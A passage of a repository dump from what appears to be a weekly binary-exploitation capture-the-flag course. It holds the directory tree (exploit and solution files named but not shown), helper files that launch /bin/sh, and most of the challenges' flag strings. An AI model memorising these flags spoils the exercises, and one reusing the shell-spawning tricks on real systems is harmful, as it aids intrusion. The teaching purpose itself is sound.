├── workdir └── .placeholder ├── src ├── week3 │ ├── .gitignore │ ├── challenges │ │ ├── shellcode-32 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── README │ │ ├── shellcode-64 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── README │ │ ├── stack-ovfl-where-32 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── .gitignore │ │ │ ├── Makefile │ │ │ ├── README │ │ │ ├── exploit-32.py │ │ │ └── stack-ovfl-where.c │ │ ├── ascii-shellcode-64 │ │ │ ├── flag │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ └── Makefile │ │ ├── nonzero-shellcode-32 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── README │ │ ├── nonzero-shellcode-64 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── README │ │ ├── stack-ovfl-no-envp-32 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ ├── Makefile │ │ │ ├── exploit-32.py │ │ │ └── stack-ovfl-no-envp.c │ │ ├── stack-ovfl-sc-32 │ │ │ ├── info.cfg │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── exploit-32.py │ │ │ ├── Makefile │ │ │ └── stack-ovfl-sc.c │ │ ├── stack-ovfl-use-envp-32 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ ├── Makefile │ │ │ ├── exploit-32.py │ │ │ └── stack-ovfl-use-envp.c │ │ ├── stack-ovfl-where-32-2 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── .gitignore │ │ │ ├── Makefile │ │ │ ├── exploit-32.py │ │ │ ├── README │ │ │ └── stack-ovfl-where.c │ │ ├── short-shellcode-32 │ │ │ ├── flag │ │ │ ├── README │ │ │ └── Makefile │ │ ├── stack-ovfl-no-envp-no-argv-32 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ ├── Makefile │ │ │ ├── exploit-32.py │ │ │ └── stack-ovfl-no-envp-no-argv.c │ │ ├── alphanumeric-shellcode-32 │ │ │ ├── flag │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ └── Makefile │ │ ├── short-shellcode-64 │ │ │ ├── flag │ │ │ ├── README │ │ │ └── Makefile │ │ ├── shellcode-template │ │ │ ├── shellcode.o │ │ │ ├── shellcode.bin │ │ │ └── Makefile │ │ ├── Makefile │ │ ├── README │ │ └── LIST │ └── Makefile ├── week6 │ ├── challenges │ │ ├── ar-2 │ │ │ ├── @ │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── exploit.py │ │ ├── sr-1 │ │ │ ├── @ │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── exploit.py │ │ │ └── sr-1.c │ │ ├── aw-1 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── exploit.py │ │ ├── fs-code-exec-64 │ │ │ ├── flag │ │ │ ├── Welcome │ │ │ ├── Makefile │ │ │ ├── exploit.py │ │ │ └── fs-code-exec-64.c │ │ ├── fs-read-1-64 │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── Makefile │ │ │ └── fs-read-1-64.c │ │ ├── fs-arbt-write-32 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── exploit.py │ │ │ └── fs-arbt-write-32.c │ │ ├── fs-code-exec-32 │ │ │ ├── Welcome │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── exploit.py │ │ │ └── fs-code-exec-32.c │ │ ├── fs-read-2-64 │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ └── Makefile │ │ ├── fs-arbt-read-64 │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── Makefile │ │ │ └── fs-arbt-read-64.c │ │ ├── fs-arbt-write-64 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── exploit.py │ │ │ └── fs-arbt-write-64.c │ │ ├── fs-code-exec-pie-64 │ │ │ ├── Thank │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── Makefile │ │ │ └── fs-code-exec-pie-64.c │ │ ├── aw-2 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── exploit.py │ │ ├── fs-arbt-read-32 │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── Makefile │ │ │ └── fs-arbt-read-32.c │ │ ├── fs-read-1-32 │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── Makefile │ │ │ └── fs-read-1-32.c │ │ ├── fs-no-binary-pie-64 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── fs-no-binary-pie-64.c │ │ ├── fs-read-2-32 │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ └── Makefile │ │ └── Makefile │ └── Makefile ├── week1 │ ├── challenges │ │ ├── level0 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── level0.c │ │ ├── level3 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── level3.c │ │ ├── level4 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── level4.c │ │ ├── level5 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── level5.c │ │ ├── level6 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ ├── test.py │ │ │ └── level6.c │ │ ├── level7 │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── test.py │ │ │ └── level7.c │ │ ├── level8 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── level8 │ │ │ ├── Makefile │ │ │ ├── test.py │ │ │ └── level8.c │ │ ├── level9 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── level9 │ │ │ ├── Makefile │ │ │ ├── test.py │ │ │ └── level9.c │ │ ├── .gitignore │ │ ├── level2 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── level2.c │ │ ├── level1 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── level1.c │ │ ├── Makefile │ │ ├── README │ │ └── TEACH │ └── Makefile ├── week5 │ ├── challenges │ │ ├── rop-4-32 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── info.cfg │ │ │ ├── exploit-32.py │ │ │ ├── Makefile │ │ │ └── rop-4-32.c │ │ ├── rop-4-64 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── info.cfg │ │ │ ├── exploit-64.py │ │ │ ├── Makefile │ │ │ └── rop-4-64.c │ │ ├── rop-5-64 │ │ │ ├── flag │ │ │ ├── sh.c │ │ │ ├── exploit.txt │ │ │ ├── Makefile │ │ │ ├── exploit-64.py │ │ │ ├── README │ │ │ └── rop-5-64.c │ │ ├── rop-1-32 │ │ │ ├── flag │ │ │ ├── .gitignore │ │ │ ├── README │ │ │ ├── exploit.txt │ │ │ ├── Makefile │ │ │ ├── exploit-rop-1.py │ │ │ └── rop-1-32.c │ │ ├── rop-2-64 │ │ │ ├── flag │ │ │ ├── .gitignore │ │ │ ├── info.cfg │ │ │ ├── README │ │ │ ├── Makefile │ │ │ ├── exploit-rop-2-64.py │ │ │ └── rop-2-64.c │ │ ├── rop-6-64 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── info.cfg │ │ │ ├── exploit-64.py │ │ │ ├── Makefile │ │ │ └── rop-6-64.c │ │ ├── rop-2-32 │ │ │ ├── flag │ │ │ ├── .gitignore │ │ │ ├── info.cfg │ │ │ ├── exploit.txt │ │ │ ├── README │ │ │ ├── Makefile │ │ │ ├── exploit-rop-2-32.py │ │ │ └── rop-2-32.c │ │ ├── rop-5-32 │ │ │ ├── flag │ │ │ ├── sh.c │ │ │ ├── exploit-32.py │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── rop-5-32.c │ │ ├── rop-1-64 │ │ │ ├── .gitignore │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── exploit.txt │ │ │ ├── Makefile │ │ │ ├── exploit-rop-1.py │ │ │ └── rop-1-64.c │ │ ├── rop-3-32 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── exploit-32.py │ │ ├── rop-3-64 │ │ │ ├── flag │ │ │ ├── info.cfg │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── exploit-64.py │ │ ├── rop-7-64 │ │ │ ├── Makefile │ │ │ └── rop-7-64.c │ │ └── Makefile │ └── Makefile ├── week4 │ ├── challenges │ │ ├── 0-dep-1 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── dep-1.c │ │ ├── 1-dep-2 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── dep-2.c │ │ ├── 2-dep-3 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── dep-3.c │ │ ├── 5-stack-cookie-3 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── stack-cookie-3.c │ │ ├── 6-stack-cookie-4 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── stack-cookie-4.c │ │ ├── 4-stack-cookie-2 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── stack-cookie-2.c │ │ ├── 3-stack-cookie-1 │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── stack-cookie-1.c │ │ └── Makefile │ └── Makefile ├── week7 │ ├── challenges │ │ ├── 2048 │ │ │ ├── 2048 │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ └── README │ │ ├── get-flag-without-write-nor-exec │ │ │ ├── @ │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── get-flag-without-write-nor-exec │ │ │ └── Makefile │ │ ├── run-command │ │ │ ├── flag │ │ │ ├── run-command │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── run-command.c │ │ ├── tocttou │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── tocttou │ │ │ ├── README │ │ │ └── tocttou.c │ │ ├── where-to-jump │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── where-to-jump │ │ │ ├── Makefile │ │ │ └── where-to-jump.c │ │ ├── intquiz │ │ │ ├── flag │ │ │ ├── intquiz │ │ │ └── Makefile │ │ ├── one-format-string │ │ │ ├── flag │ │ │ ├── one-format-string │ │ │ ├── README │ │ │ ├── Makefile │ │ │ └── one-format-string.c │ │ ├── guess-my-random │ │ │ ├── flag │ │ │ ├── README │ │ │ ├── guess-my-random │ │ │ ├── Makefile │ │ │ └── guess-my-random.c │ │ ├── guess-passwd │ │ │ ├── flag │ │ │ ├── Makefile │ │ │ ├── guess-passwd │ │ │ ├── README │ │ │ ├── guess-passwd.c │ │ │ └── guess-passwd-real.c │ │ ├── caffeinated-tocttou │ │ │ ├── flag │ │ │ ├── caffeinated-tocttou │ │ │ └── Makefile │ │ ├── deprivileged │ │ │ ├── flag │ │ │ ├── exploit.py │ │ │ ├── deprivileged │ │ │ ├── Makefile │ │ │ ├── README │ │ │ └── deprivileged.c │ │ └── Makefile │ └── Makefile └── week2 │ ├── challenges │ ├── .gitignore │ ├── bof-level5 │ │ ├── flag │ │ ├── Makefile │ │ ├── exploit.py │ │ ├── README │ │ └── bof-level5.c │ ├── bof-level7 │ │ ├── flag │ │ ├── Makefile │ │ ├── exploit.py │ │ ├── README │ │ └── bof-level7.c │ ├── bof-level9 │ │ ├── flag │ │ ├── README │ │ ├── Makefile │ │ ├── exploit.py │ │ └── bof-level9.c │ ├── bof-level6 │ │ ├── flag │ │ ├── bof-level6 │ │ ├── exploit.txt │ │ ├── Makefile │ │ ├── exploit.py │ │ ├── README │ │ └── bof-level6.c │ ├── bof-level0 │ │ ├── flag │ │ ├── exploit.py │ │ ├── Makefile │ │ ├── README │ │ └── bof-level0.c │ ├── bof-level2 │ │ ├── flag │ │ ├── Makefile │ │ ├── exploit.py │ │ ├── README │ │ └── bof-level2.c │ ├── bof-level3 │ │ ├── flag │ │ ├── Makefile │ │ ├── exploit.py │ │ ├── README │ │ └── bof-level3.c │ ├── bof-level1 │ │ ├── flag │ │ ├── exploit.py │ │ ├── Makefile │ │ ├── README │ │ └── bof-level1.c │ ├── bof-level4 │ │ ├── flag │ │ ├── Makefile │ │ ├── exploit.py │ │ └── README │ ├── bof-level8 │ │ ├── flag │ │ ├── bof-level8 │ │ ├── Makefile │ │ ├── exploit.py │ │ ├── README │ │ └── bof-level8.c │ ├── Makefile │ ├── README │ └── TEACH │ └── Makefile ├── run.sh ├── solutions ├── week2 │ ├── bof-level0.py │ ├── bof-level1.py │ ├── bof-level2.py │ ├── bof-level3.py │ ├── bof-level4.py │ ├── bof-level5.py │ ├── bof-level9.py │ ├── bof-level6.py │ ├── bof-level7.py │ └── bof-level8.py ├── week3 │ ├── stack-ovfl-sc-32.py │ ├── stack-ovfl-no-envp-32.py │ ├── stack-ovfl-use-envp-32.py │ ├── stack-ovfl-where-32-2.py │ ├── stack-ovfl-where-32.py │ └── stack-ovfl-no-envp-no-argv-32.py ├── week6 │ ├── fs-read-2-64.py │ ├── fs-read-1-32.py │ ├── fs-read-1-64.py │ ├── fs-read-2-32.py │ ├── aw-1.py │ ├── fs-arbt-write-32.py │ ├── fs-arbt-read-32.py │ ├── fs-arbt-read-64.py │ ├── fs-arbt-write-64 │ ├── aw-2.py │ ├── fs-code-exec-32.py │ ├── sr-1.py │ ├── ar-2.py │ └── fs-code-exec-64.py ├── week5 │ ├── rop-3-32.py │ ├── rop-3-64.py │ ├── rop-5-32.py │ ├── rop-1-32.py │ ├── rop-2-32.py │ ├── rop-5-64.py │ └── rop-4-32.py └── week7 │ ├── where-to-jump.py │ ├── deprivileged.py │ └── get-flag-without-write-nor-exec.py └── setup-workdir.py /workdir/.placeholder: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/week3/.gitignore: -------------------------------------------------------------------------------- 1 | backup 2 | -------------------------------------------------------------------------------- /src/week6/challenges/ar-2/@: -------------------------------------------------------------------------------- 1 | /bin/sh -------------------------------------------------------------------------------- /src/week6/challenges/sr-1/@: -------------------------------------------------------------------------------- 1 | /bin/sh -------------------------------------------------------------------------------- /src/week1/challenges/level0/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/week1/challenges/level3/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level4/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level5/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level6/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level6/flag: -------------------------------------------------------------------------------- 1 | cand{bubble_p0p} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level7/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level7/README: -------------------------------------------------------------------------------- 1 | memfrob()... 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level9/.gitignore: -------------------------------------------------------------------------------- 1 | level2 2 | -------------------------------------------------------------------------------- /src/week4/challenges/0-dep-1/flag: -------------------------------------------------------------------------------- 1 | cand{PATH?} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/ar-2/flag: -------------------------------------------------------------------------------- 1 | cand{l3ak_tH4_G0T} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/flag: -------------------------------------------------------------------------------- 1 | cand{rabbit_numbers} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level9/flag: -------------------------------------------------------------------------------- 1 | cand{prime_nUmbers} 2 | -------------------------------------------------------------------------------- /src/week4/challenges/1-dep-2/flag: -------------------------------------------------------------------------------- 1 | cand{l1bc_sy5t3M} 2 | -------------------------------------------------------------------------------- /src/week4/challenges/2-dep-3/flag: -------------------------------------------------------------------------------- 1 | cand{0pn_r3Ad_w1rtE} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/sr-1/flag: -------------------------------------------------------------------------------- 1 | cand{l3ak_thA_st4cK} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/2048/flag: -------------------------------------------------------------------------------- 1 | cand{Int3g3r_Und3rfl0w} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/get-flag-without-write-nor-exec/@: -------------------------------------------------------------------------------- 1 | flag -------------------------------------------------------------------------------- /src/week7/challenges/run-command/flag: -------------------------------------------------------------------------------- 1 | cand{use_$(<>)} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/tocttou/flag: -------------------------------------------------------------------------------- 1 | cand{rAc3_c0nD1tIoN} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/.gitignore: -------------------------------------------------------------------------------- 1 | .gdb_history 2 | peda*.txt 3 | -------------------------------------------------------------------------------- /src/week1/challenges/level2/flag: -------------------------------------------------------------------------------- 1 | cand{reversing_is_easy} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level3/flag: -------------------------------------------------------------------------------- 1 | cand{understand_the_loop} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level5/flag: -------------------------------------------------------------------------------- 1 | cand{two_s_complement} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/.gitignore: -------------------------------------------------------------------------------- 1 | .gdb_history 2 | peda*.txt 3 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level5/flag: -------------------------------------------------------------------------------- 1 | cand{l3avE_p0pS_EBP} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level7/flag: -------------------------------------------------------------------------------- 1 | cand{oN3_ByTe_mAtTeRs} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level9/flag: -------------------------------------------------------------------------------- 1 | cand{c0nTro11iNg_ECX} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-32/flag: -------------------------------------------------------------------------------- 1 | cand{execve_bin_sh} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-64/flag: -------------------------------------------------------------------------------- 1 | cand{exEcvE_b1n_5h 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32/flag: -------------------------------------------------------------------------------- 1 | cand{st4cK?} 2 | -------------------------------------------------------------------------------- /src/week4/challenges/5-stack-cookie-3/flag: -------------------------------------------------------------------------------- 1 | cand{0ne_by_1} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/flag: -------------------------------------------------------------------------------- 1 | cand{PwN_G0T_VIA_ROP} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/aw-1/flag: -------------------------------------------------------------------------------- 1 | cand{Ov3rWrit3_G0T_viA_Aw} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-64/flag: -------------------------------------------------------------------------------- 1 | cand{l0v3_hn} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level0/flag: -------------------------------------------------------------------------------- 1 | cand{ltrace_is_a_good_friend} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level1/flag: -------------------------------------------------------------------------------- 1 | cand{gdb_is_a_better_friend} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/flag: -------------------------------------------------------------------------------- 1 | cand{Alter_RbP_iN_AmD64} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/ascii-shellcode-64/flag: -------------------------------------------------------------------------------- 1 | cand{n0T_Th4T_h4rD} 2 | -------------------------------------------------------------------------------- /src/week4/challenges/6-stack-cookie-4/flag: -------------------------------------------------------------------------------- 1 | cand{wa1k_ar0uNd} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-32/flag: -------------------------------------------------------------------------------- 1 | cand{p0p_pOp_PoP_P0P_RET} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/flag: -------------------------------------------------------------------------------- 1 | cand{oPeN_r3AD_WriTE_eX1t} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-6-64/flag: -------------------------------------------------------------------------------- 1 | cand{W3_c4N_ch41N_ANY_RET} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-64/flag: -------------------------------------------------------------------------------- 1 | cand{R3ad_St4cK_w1tH_%p} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/where-to-jump/flag: -------------------------------------------------------------------------------- 1 | cand{st4ck_p1v0t_t0_ROP} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level7/flag: -------------------------------------------------------------------------------- 1 | cand{the_number_42_for_the_universe} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level0/flag: -------------------------------------------------------------------------------- 1 | cand{Overwr1t3_l0c4l_v4riaBl3s} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level2/flag: -------------------------------------------------------------------------------- 1 | cand{Ov3rWr1te_R3turN_4dDr3s5} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level3/flag: -------------------------------------------------------------------------------- 1 | cand{AMD64_1s_als0_Vu1n3RaBlE} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/nonzero-shellcode-32/flag: -------------------------------------------------------------------------------- 1 | cand{push_aNd_X0R} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/nonzero-shellcode-64/flag: -------------------------------------------------------------------------------- 1 | cand{n0_puSh_bUt_CLTD} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/flag: -------------------------------------------------------------------------------- 1 | cand{n0_ENVP_1S_ok} 2 | -------------------------------------------------------------------------------- /src/week4/challenges/4-stack-cookie-2/flag: -------------------------------------------------------------------------------- 1 | cand{rand_15_n0t_r4Nd0M} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/flag: -------------------------------------------------------------------------------- 1 | cand{N0W_Y0U_C4N_0p3n_r3aD_wR1t3} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/flag: -------------------------------------------------------------------------------- 1 | cand{bu1lD_a_StR1nG_U5iN9_sTrCpY} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/flag: -------------------------------------------------------------------------------- 1 | cand{fUn_W1tH_BU1LD1n9_StR1nG} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-32/flag: -------------------------------------------------------------------------------- 1 | cand{Ov3rw1te_G0t_t0_G3t_sh3ll?} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-32/flag: -------------------------------------------------------------------------------- 1 | cand{b3_fr1EnDLy_t0_%n} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-32/Welcome: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | /bin/sh 3 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-64/Welcome: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | /bin/sh 3 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-2-64/flag: -------------------------------------------------------------------------------- 1 | cand{amd64_w0n't_fiX_the_vuLn} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/intquiz/flag: -------------------------------------------------------------------------------- 1 | cand{Int3gEr_1S_A_D1fFicUlT_M4tt3r} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/one-format-string/flag: -------------------------------------------------------------------------------- 1 | cand{make_BOF_via_FSV} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level4/flag: -------------------------------------------------------------------------------- 1 | cand{use_some_trick_to_fool_the_program} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/info.cfg: -------------------------------------------------------------------------------- 1 | stack-ovfl-sc-32, flag-32 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/flag: -------------------------------------------------------------------------------- 1 | cand{enVp_i5_Y0uR_Fr1end} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/flag: -------------------------------------------------------------------------------- 1 | cand{LD_LD_LD_ld_ld_ld} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-32/flag: -------------------------------------------------------------------------------- 1 | cand{mpr0t3ct_7_and_th3n_Sh3l1c0De} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-64/flag: -------------------------------------------------------------------------------- 1 | cand{d0e5_NULL_m4tt3rS_t0_yOu?} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-64/flag: -------------------------------------------------------------------------------- 1 | cand{aRb1tRarY_wR1t3_v1a_%x_%n} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-pie-64/Thank: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | /bin/sh 3 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-my-random/flag: -------------------------------------------------------------------------------- 1 | cand{Spr1nTf_c0ns1d3r3d_HarMfuL} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-passwd/flag: -------------------------------------------------------------------------------- 1 | cand{t1ming_s1de_channel_4ttacK} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level1/flag: -------------------------------------------------------------------------------- 1 | cand{Twic3_Th3_biTs_d0uBle_y0uR_0v3rf1oW} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level4/flag: -------------------------------------------------------------------------------- 1 | cand{S1mpl3_c0pY_c4nT_pR0t3cT_retaddr} 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level8/flag: -------------------------------------------------------------------------------- 1 | cand{nEv3r_eV3r_LeT_yOuR_bUfF3r_0v3rFlovv} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/short-shellcode-32/flag: -------------------------------------------------------------------------------- 1 | cand{HoW_m4ny_byt3s_d0_y0u_need?} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/info.cfg: -------------------------------------------------------------------------------- 1 | stack-ovfl-sc-32, flag-32 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/flag: -------------------------------------------------------------------------------- 1 | cand{w0w_You_G0T_it} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/info.cfg: -------------------------------------------------------------------------------- 1 | stack-ovfl-sc-32, flag-32 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/info.cfg: -------------------------------------------------------------------------------- 1 | stack-ovfl-sc-32, flag-32 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32/info.cfg: -------------------------------------------------------------------------------- 1 | stack-ovfl-sc-32, flag-32 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-64/flag: -------------------------------------------------------------------------------- 1 | cand{rdi_rsi_rdx_f0r_p4ss1nG_args_in_amd64} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/aw-2/flag: -------------------------------------------------------------------------------- 1 | cand{yoU_G0t_4rbiTraRy_R3aD_and_ARb1tr4ry_Wr1t3} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-32/flag: -------------------------------------------------------------------------------- 1 | cand{y0u_m4y_r3ad_anY_addR_v1a_%s} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-pie-64/flag: -------------------------------------------------------------------------------- 1 | cand{OnE_m0r3_l3ak_tO_pWn_PIE} 2 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-32/flag: -------------------------------------------------------------------------------- 1 | cand{F0rMaT_Str1ng_AS_S3qu3nt1al_R3aD} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/flag: -------------------------------------------------------------------------------- 1 | cand{Put_y0ur_sh3llc0de_0n_th3_St4ck} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week4/challenges/3-stack-cookie-1/flag: -------------------------------------------------------------------------------- 1 | cand{bad_faceb00c_dead_faceb00c_cafebabe} 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/flag: 